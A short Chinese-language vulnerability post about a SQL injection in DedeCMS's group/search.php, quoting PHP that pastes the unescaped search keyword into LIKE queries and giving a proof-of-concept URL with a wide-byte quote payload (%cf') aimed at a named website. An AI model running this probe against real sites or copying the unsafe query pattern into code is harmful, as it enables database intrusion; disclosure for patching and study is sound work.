漏洞发者:落叶纷飞

dedecms漏洞还有几个 打算每天发布一个了

-----------------------------------------------------------------------------

注射group/search.php

................................................................................................

if(empty($sad)) $sad = "t";
if(empty($keyword)){
 ShowMsg("错误,请输入搜索关键字！","-1");
 exit();
}
if($sad=="g"){
 $searchtable = "#@__groups";
 $WhereSql = "WHERE ishidden=0 AND groupname like '%".$keyword."%'";
 $Orders = "ORDER BY stime DESC";
}else{
 $searchtable = "#@__group_threads";
 $WhereSql = "WHERE closed=0 AND subject like '%".$keyword."%'";
 $Orders = "ORDER BY lastpost DESC";
}

..............................................................................................

http://www.03389.com/dg/group/search.php?sad=g&keyword=%cf'